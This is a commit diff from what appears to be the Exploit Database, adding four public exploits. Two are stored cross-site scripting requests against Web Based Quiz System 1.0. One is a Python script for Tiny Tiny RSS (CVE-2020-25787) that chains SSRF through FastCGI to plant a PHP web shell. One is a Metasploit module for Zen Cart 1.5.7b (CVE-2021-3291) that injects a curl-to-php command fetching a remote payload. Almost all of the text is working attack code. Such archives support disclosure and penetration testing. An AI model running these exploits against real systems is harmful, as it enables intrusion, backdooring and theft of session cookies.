DB: 2021-03-03

4 changes to exploits/shellcodes

Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting
Tiny Tiny RSS - Remote Code Execution
Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting
Zen Cart 1.5.7b - Remote Code Execution (Authenticated)
This commit is contained in:
Offensive Security 2021-03-03 05:01:55 +00:00
parent 75667550f6
commit b35005d47b
5 changed files with 402 additions and 0 deletions

View file

@ -0,0 +1,42 @@
# Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting
# Date: 2021-03-02
# Exploit Author: Praharsh Kumar Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software: Web Based Quiz System
# Version: 1.0
# Vulnerability Type: Cross-site Scripting
# Vulnerability: Persistent/Stored XSS
# Tested on: Parrot OS
# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
# in adding questions in options parameter affected from this vulnerability.
# payload: </script><script >alert(document.cookie)</script>
POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1
Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c
POC:
# go to url http://localhost:8080/admin.php
# login and add question
# then put the above payload in MCQ options parameter
# then fill the remaining details
# then click add
# go to url http://localhost:8080/login.php
# then login to user account
# then attempt the quiz while attempting the quiz xss pop up there..!

83
exploits/php/webapps/49606.py Executable file
View file

@ -0,0 +1,83 @@
# Exploit Title: Tiny Tiny RSS - Remote Code Execution
# Date: 21/09/2020
# Exploit Author: Daniel Neagaru & Benjamin Nadarević
# Blog post: https://www.digeex.de/blog/tinytinyrss/
# Software Link: https://git.tt-rss.org/fox/tt-rss
# Version: all before 2020-09-16
# Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef
# Tested on: default docker installation method
# CVE : CVE-2020-25787
#!/usr/bin/env python3
from sys import argv
import urllib.parse as ul
import base64
def CustomFcgi( filename, output, backdoor):
length=len(output)+len(backdoor)+64
char=chr(length)
data = "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e" + chr(len(str(length)))
data += "CONTENT_LENGTH" + str(length) + "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n"
data += "disable_functions = \nauto_prepend_file = php://input\x0f" + chr(len(filename)) +"SCRIPT_FILENAME" + filename + "\r\x01DOCUMENT_ROOT/"
temp1 = chr(len(data) // 256)
temp2 = chr(len(data) % 256)
temp3 = chr(len(data) % 8)
end = str("\x00"*(len(data)%8)) + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00" + char + "\x04\x00"
end += "<?php file_put_contents('" + output + "',base64_decode("+ "'"+str(backdoor.decode('ascii'))+"')"+");die('executed');?>\x00\x00\x00\x00"
start = "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01" + temp1 + temp2 + temp3 + "\x00"
payload = start + data + end
def get_payload(payload):
finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+","%20").replace("%2F","/")
return finalpayload
return "gopher://localhost:9000/_"+get_payload(get_payload(payload))
TTRSS_PATH = "/var/www/html/tt-rss/"
BACKDOOR_CODE = """
<?php
echo "success\n";
echo system($_GET['cmd']);
?>
"""
feed_file = open("malicious_RCE_feed.xml",'w')
filename = TTRSS_PATH + "config.php"
output = TTRSS_PATH + "backdoor.php"
backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii"))
rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text"
feed ="""<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0">
<channel>
<title>Exploit demo - rce</title>
<link></link>
<description>You are getting infected :(</description>
<item>
<title> Check if there is backdoor.php</title>
<link><![CDATA[backdoor.php?cmd=id&bypass_filter=://]]></link>
<description>
<![CDATA[
Dummy text
<img src="{}">
]]>
</description>
</item>
</channel>
</rss>
""".format(rce)
feed_file.write(feed)
feed_file.close()

View file

@ -0,0 +1,60 @@
# Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting
# Date: 2021-03-02
# Exploit Author: P.Naveen Kumar
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software : Web Based Quiz System
# Version : 1.0
# Vulnerability Type : Cross-site Scripting
# Vulnerability : Persistent/Stored XSS
# Tested on: Windows 10 Pro
# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
# in registration form in name parameter affected from this vulnerability.
# payload: <script>alert(document.cookie)</script>
# HTTP POST request
POST http://localhost:8080/quiz/register.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636
Content-Length: 690
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/quiz/register.php
Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er
Upgrade-Insecure-Requests: 1
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="name"
<script>alert(document.cookie)</script>
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="email"
test123@gmail.com
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="password"
Hacker
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="college"
hello
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="submit"
-----------------------------283640616528311462411171270636--
POC:
# go to url http://localhost:8080/quiz/register.php
# then you have to fill the above payload in name/username parameter
# then fill the remaining details
# then click submit
# then login to user account
# then attempt any one quiz after attempting go to ranking section then
# you can see xss pop up there..!

213
exploits/php/webapps/49608.rb Executable file
View file

@ -0,0 +1,213 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
###
#
#
# This exploit write payload in database and trig to command
# a bug in an zencart v1.5.7b web application
#
###
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(
update_info(
info,
'Name' => 'zencart authenticated remote code execution exploit',
'Description' => %q(
This exploit module execution os command in zencart.
),
'License' => MSF_LICENSE,
'Author' => ['Mucahit Saratar <trregen222@gmail.com>'], # msf module & research & poc
'References' =>[
[ 'OSVDB', '' ],
[ 'EDB', '' ],
[ 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc'],
[ 'CVE', '2021-3291']
],
'Platform' => 'php',
'Privileged' => false,
'Arch' => ARCH_PHP,
'Targets' => [ ['Automatic', { }] ],
'DisclosureDate' => '2021-01-22',
'DefaultTarget' => 0
)
)
register_options(
[
Opt::RPORT(80),
OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
OptString.new('PASSWORD', [ true, 'Password to login with', '']),
OptString.new('BASEPATH', [ true, 'zencart base path eg. /zencart/', '/']),
OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment']),
OptString.new('SETTING', [ true, 'setting name. eg. freecharger for payment', 'freecharger']),
OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/'])
], self.class
)
end
def start_server
ssltut = false
if datastore["SSL"]
ssltut = true
datastore["SSL"] = false
end
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
print_status("payload is on #{get_uri}")
@adresim = get_uri
datastore['SSL'] = true if ssltut
end
def on_request_uri(cli, request)
print_good('First stage is executed ! Sending 2nd stage of the payload')
send_response(cli, payload.encoded, {'Content-Type'=>'text/html'})
end
def tabanyol
datastore["BASEPATH"]
end
def isim
datastore["USERNAME"]
end
def parola
datastore["PASSWORD"]
end
def login
#"index.php?cmd=login&camefrom=index.php"
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
'vars_get' => {
'cmd' => 'login',
'camefrom' => 'index.php'
})
# <input type="hidden" name="securityToken" value="c77815040562301dafaef1c84b7aa3f3" />
unless res
fail_with(Failure::Unreachable, "Access web application failure")
end
if res.code != 200
fail_with(Failure::Unreachable, "we not have 200 response")
end
if !res.get_cookies.empty?
@cookie = res.get_cookies
@csrftoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || ''
if @csrftoken.empty?
fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
end
vprint_good("login Csrf token: "+@csrftoken)
end
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php"),
'cookie' => @cookie,
'vars_post' => {
'securityToken' => @csrftoken,
'action' => "do"+@csrftoken,
'admin_name' => isim,
'admin_pass' => parola
})
if res.code != 302
fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.')
end
true
end
def check
unless login
fail_with(Failure::UnexpectedReply, 'Wrong credentials')
return CheckCode::NotVulnerable('Wrong credentials')
end
print_good("We loged in")
Exploit::CheckCode::Vulnerable
CheckCode::Vulnerable('Authenticated successfully')
end
def exploit
check
start_server
sleep(4)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
'vars_get' => {
'cmd' => 'modules',
'set' => datastore["MODULE"],
'module' => datastore["SETTING"],
'action' => 'edit'
},
'cookie' => @cookie
)
if res.code != 200
fail_with(Failure::UnexpectedReply, 'Something Wron. code must be 200')
end
# <input type="hidden" name="securityToken" value="09068bece11256d03ba55fd2d1f9c820" />
if res && res.code == 200
@formtoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || ''
if @formtoken.empty?
fail_with(Failure::UnexpectedReply, 'securitytoken not in response')
end
#print_good(@formtoken)
# <form name="modules"
@radiolar = res.body.scan(/<input type="radio" name="configuration\[(.*)\]" value="True"/)
@selectler = res.body.scan(/<select rel="dropdown" name="configuration\[(.*)\]" class="form-control">/)
@textarr = res.body.scan(/<input type="text" name="configuration\[(.*)\]" value="0" class="form-control" \/>/)
@secme = {}
@secme["securityToken"] = @formtoken
for @a in @radiolar
@secme["configuration[#{@a[0]}]"] = "True','F'); echo `curl #{@adresim} |php`; //"
end
for @a in @selectler
@secme["configuration[#{@a[0]}]"] = "0"
end
for @a in @textarr
@secme["configuration[#{@a[0]}]"] = "0"
end
print_good(@secme.to_s)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
'cookie' => @cookie,
'vars_get' => {
'cmd' => 'modules',
'set' => datastore["MODULE"],
'module' => datastore["SETTING"],
'action' => 'save'
},
'vars_post' => @secme
)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
'vars_get' => {
'cmd' => 'modules',
'set' => datastore["MODULE"],
'module' => datastore["SETTING"],
'action' => 'edit'
},
'cookie' => @cookie
)
end
end
end

View file

@ -43793,3 +43793,7 @@ id,file,description,date,author,type,platform,port
49602,exploits/multiple/webapps/49602.py,"VMware vCenter Server 7.0 - Unauthenticated File Upload",2021-03-01,Photubias,webapps,multiple,
49603,exploits/php/webapps/49603.py,"Online Catering Reservation System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-01,"Christian Vierschilling",webapps,php,
49604,exploits/php/webapps/49604.py,"Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-01,"Christian Vierschilling",webapps,php,
49605,exploits/php/webapps/49605.txt,"Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting",2021-03-02,"Praharsh Kumar Singh",webapps,php,
49606,exploits/php/webapps/49606.py,"Tiny Tiny RSS - Remote Code Execution",2021-03-02,"Daniel Neagaru",webapps,php,
49607,exploits/php/webapps/49607.txt,"Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting",2021-03-02,"P.Naveen Kumar",webapps,php,
49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",2021-03-02,"Mücahit Saratar",webapps,php,

Can't render this file because it is too large.